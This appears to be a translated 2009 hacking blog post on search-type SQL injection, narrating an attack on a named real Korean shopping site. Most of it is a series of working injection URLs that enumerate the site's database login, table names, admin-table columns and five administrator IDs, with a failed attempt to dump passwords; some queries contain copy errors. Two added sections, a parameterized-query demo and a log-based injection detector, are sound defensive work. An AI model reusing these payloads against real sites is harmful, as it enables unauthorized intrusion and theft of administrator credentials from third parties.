
Search-Type Injection: A Simple Search-Type Injection

Published: Saturday, 12 September 2009 | Views: 63 | Comments: 0
A quick way to tell whether a search-type injection flaw exists: first search for a single apostrophe ' ; if that produces an error, there is roughly a 90% chance the flaw is there. Then search for % ; if that returns a normal page, the chance is about 95%.

Next, search for some keyword, say 2006, which should return everything related to 2006. Now search for 2006%'and 1=1 and '%'=' and for 2006%'and 1=2 and '%'='. If the two results differ, the flaw is confirmed 100%.
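An added example, not code from the original post: a small Python/SQLite script that reproduces the three probes above against a LIKE search built by string concatenation and against the same search written with a bound parameter. The product table and every value in it are constructed; the original target ran ASP.NET with SQL Server, but the concatenation mistake and its fix are the same.

```python
"""
Added example (not code from the original post): the three probes described above,
run against a LIKE search built by string concatenation and against the same search
written with a bound parameter. Uses an in-memory SQLite database with a constructed
product table; the original target was ASP.NET + SQL Server, but the mistake is the same.
"""
import sqlite3

# Constructed sample rows, not data from the original page.
PRODUCTS = [
    ("Donic 2006 rubber", 2006),
    ("Butterfly 2006 blade", 2006),
    ("Stiga 2007 blade", 2007),
]

# The post's probes: a keyword, the bare wildcard, and the true/false pair.
PROBES = {
    "plain":   "2006",
    "percent": "%",
    "true":    "2006%'and 1=1 and '%'='",
    "false":   "2006%'and 1=2 and '%'='",
}

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (name TEXT, year INTEGER)")
    conn.executemany("INSERT INTO product VALUES (?, ?)", PRODUCTS)
    return conn

def search_vulnerable(conn, term):
    """The bug: the search term is pasted into the LIKE literal, so %' closes the
    string and whatever follows becomes part of the WHERE clause."""
    sql = "SELECT name FROM product WHERE name LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]

def search_safe(conn, term):
    """The fix: the term travels as a bound value and is never parsed as SQL."""
    sql = "SELECT name FROM product WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]

def probe(search_fn):
    """Run every probe through search_fn and return {probe name: row count}."""
    conn = make_db()
    return {label: len(search_fn(conn, term)) for label, term in PROBES.items()}

def is_differential(search_fn):
    """True when the 1=1 and 1=2 probes return different row counts: the signal
    the post uses to confirm the injection."""
    counts = probe(search_fn)
    return counts["true"] != counts["false"]

def quote_probe_errors(search_fn):
    """True when searching for a lone apostrophe raises a database error: the
    post's first test."""
    conn = make_db()
    try:
        search_fn(conn, "'")
    except sqlite3.Error:
        return True
    return False

if __name__ == "__main__":
    for name, fn in (("concatenated", search_vulnerable), ("parameterized", search_safe)):
        print(name, probe(fn), "apostrophe error:", quote_probe_errors(fn),
              "differential:", is_differential(fn))
```

On the concatenated query the apostrophe probe raises a database error and the 1=1 / 1=2 pair returns 2 rows versus 0, exactly the differential the post relies on. With the bound parameter both probes return 0 rows and the apostrophe is just a character to search for, so the test above has nothing to detect. One caveat: binding the value stops the structural injection but leaves % and _ acting as LIKE wildcards; if that is not wanted, escape them in the value and add an ESCAPE clause.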

Having seen that this site had the hole described above, I started scanning it with NBSI, but it kept timing out. Frustrating; it looks like I'll have to dump the information I need by hand.

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and user>0 and '%'='       //gets the current database login

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and db_name>0 and '%'='       //gets the current database name

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select count(*) from admin)>0 and '%'='     //judging from the returned page, there is no table named admin

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0)>0 and '%'='         //gets the first table name in the current database

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange'))>0 and '%'='          //gets the 2nd table name in the current database

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange','oldpo'))>0 and '%'='           //gets the 3rd table name in the current database

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and%20(select%20top%201%20name%20from%20lvhuana3.dbo.sysobjects%20where%20xtype='u'%20and%20status>0%20and%20name%20not%20in('codechange','oldpo','tbl_admin','tbl_afterservice','tbl_agent','tbl_bank','tbl_board','tbl_board2','tbl_brandbestLeft','tbl_brandbestRight','tbl_card','tbl_cart','tbl_catalogue','tbl_community','tbl_court','tbl_estimate','tbl_FAQ','tbl_mail_list','tbl_mem_add','tbl_mem_','tbl_mem_out','tbl_mem_rboard','tbl_mileage','tbl_notice','tbl_ord_cash_receipt','tbl_ord_change''tbl_ord_cs','tbl_ord_change','tbl_ord_cs','tbl_ord_','tbl_ord_payment','tbl_ord_prd','tbl_ord_prd_','tbl_ord_refund','tbl_ord_req_','tbl_ord_req_prd','tbl_ord_request','tbl_ord_user','tbl_partition','tbl_prd_category','tbl_prd_click','tbl_prd_desc','tbl_prd_grade','tbl_prd_','tbl_prd_model','tbl_recommand','tbl_saleshop','tbl_search','tbl_tax','tbl_zipcode','tempDesc','tempdesc2','tempmodel','tempPrdMain','tempPrdmodel','tempsize','tempstyle','tmpordprd','tmpordprd2','trace1'))>0%20and%20'%'='         //and so on, until all the table names are obtained

Looking at the list, only the tbl_admin table really matters, so next I started dumping its column names.

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),1) from tbl_admin)>0 and '%'='      //gets the 1st column name in tbl_admin: c_employee_id

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),2) from tbl_admin)>0 and '%'='      //gets the 2nd column name in tbl_admin: c_employee_name

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'='      //gets the 3rd column name in tbl_admin: c_password

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'='      //gets the 4th column name in tbl_admin: c_level

Column names done, heh. Next, dump the administrator account names and passwords.

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 c_employee_id from tbl_admin)>0 and '%'='        //gets the 1st administrator id: 943hoon

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 2 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'='              //gets the 2nd administrator id: champ

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 3 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'='              //gets the 3rd administrator id: clark

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'='              //gets the 4th administrator id: hskim

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'='              //gets the 5th administrator id: jajeong

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 c_c_password from tbl_admin)>0 and '%'='        //this statement should dump the administrator password, but unfortunately it just returned the normal page. Frustrating.

I'll think of another approach later.
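An added example, not code from the original post: a Python detector that pulls the search parameter out of web-server access log lines and flags the probe shapes used in the requests above (the '…and '%'=' quote rebalance, the 1=1 / 1=2 pair, user>0 and db_name>0, sysobjects and col_name(object_id(…)) enumeration, select top N extraction). The log lines, request path, client addresses and status codes are constructed; 203.0.113.7 and 198.51.100.4 are documentation addresses, not real clients.

```python
"""
Added example (not code from the original post): flag the search-type injection probes
described above when they turn up in the `search` parameter of access log lines.
All log lines, paths, client addresses and status codes below are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Each rule is (name, regex) run against the URL-decoded search value.
RULES = [
    # closes the LIKE literal with %' and re-balances quotes with '%'='
    ("quote-rebalance", re.compile(r"'\s*and\b.*\band\s*'%'\s*=\s*'", re.I)),
    # the true/false pair used to confirm the hole
    ("boolean-probe",   re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    # table-name enumeration through the system catalogue
    ("sysobjects-enum", re.compile(r"\bsysobjects\b", re.I)),
    # column-name enumeration
    ("column-enum",     re.compile(r"\bcol_name\s*\(\s*object_id\s*\(", re.I)),
    # error-based disclosure of login and database name via type conversion
    ("errorbased-meta", re.compile(r"\b(user|db_name)\s*>\s*0", re.I)),
    # row-by-row extraction
    ("top-n-extract",   re.compile(r"\bselect\s+top\s+\d+\b", re.I)),
]

# Common log format: client, identd, user, [time], "method path proto", status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def search_value(path):
    """Return the decoded `search` query value from a request path, or None."""
    qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
    vals = qs.get("search")
    return vals[0] if vals else None

def classify(decoded):
    """Names of every rule the decoded search value matches, in RULES order."""
    return [name for name, rx in RULES if rx.search(decoded)]

def scan_log(lines):
    """(client ip, status, matched rule names) for each line whose search value matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        value = search_value(m.group("path"))
        if value is None:
            continue
        names = classify(value)
        if names:
            hits.append((m.group("ip"), int(m.group("status")), names))
    return hits

def boolean_pairs(lines):
    """Clients that sent both the 1=1 and the 1=2 probe: the differential test itself."""
    seen = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        value = search_value(m.group("path")) or ""
        for label, pattern in (("true", r"\band\s+1\s*=\s*1\b"), ("false", r"\band\s+1\s*=\s*2\b")):
            if re.search(pattern, value, re.I):
                seen.setdefault(m.group("ip"), set()).add(label)
    return sorted(ip for ip, labels in seen.items() if labels == {"true", "false"})

# Constructed sample log. 203.0.113.7 / 198.51.100.4 are documentation addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Sep/2009:10:00:01 +0800] "GET /product/list_search.aspx?search=2006 HTTP/1.1" 200 5120
203.0.113.7 - - [12/Sep/2009:10:00:05 +0800] "GET /product/list_search.aspx?search=2006%'and%201=1%20and%20'%'=' HTTP/1.1" 200 5120
203.0.113.7 - - [12/Sep/2009:10:00:09 +0800] "GET /product/list_search.aspx?search=2006%'and%201=2%20and%20'%'=' HTTP/1.1" 200 1210
203.0.113.7 - - [12/Sep/2009:10:01:30 +0800] "GET /product/list_search.aspx?search=Donic%'and%20user>0%20and%20'%'=' HTTP/1.1" 500 3022
203.0.113.7 - - [12/Sep/2009:10:02:11 +0800] "GET /product/list_search.aspx?search=Donic%'and%20(select%20top%201%20name%20from%20db.dbo.sysobjects%20where%20xtype='u')>0%20and%20'%'=' HTTP/1.1" 500 3022
203.0.113.7 - - [12/Sep/2009:10:02:40 +0800] "GET /product/list_search.aspx?search=Donic%'and%20(select%20top%201%20col_name(object_id('tbl_x'),1)%20from%20tbl_x)>0%20and%20'%'=' HTTP/1.1" 500 3022
198.51.100.4 - - [12/Sep/2009:10:03:00 +0800] "GET /product/list_search.aspx?search=Donic+rubber HTTP/1.1" 200 4800
198.51.100.4 - - [12/Sep/2009:10:03:20 +0800] "GET /product/list_search.aspx?search=O'Neill HTTP/1.1" 500 3022
""".splitlines()

if __name__ == "__main__":
    for ip, status, names in scan_log(SAMPLE_LOG):
        print(ip, status, ", ".join(names))
    print("differential pairs from:", boolean_pairs(SAMPLE_LOG))
```

The last sample line, a search for O'Neill that ends in a 500, is there on purpose: the error alone is the same symptom the post's first test looks for, but with no injection grammar in the value it is a bug report, not an attack, and the rules correctly leave it unflagged. The paired 1=1 / 1=2 check in boolean_pairs is the higher-confidence signal, because a single boolean probe can be noise but the pair is the confirmation step itself.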


Tags: search-type injection
[Image attachment: thumbnail, 613 x 423]



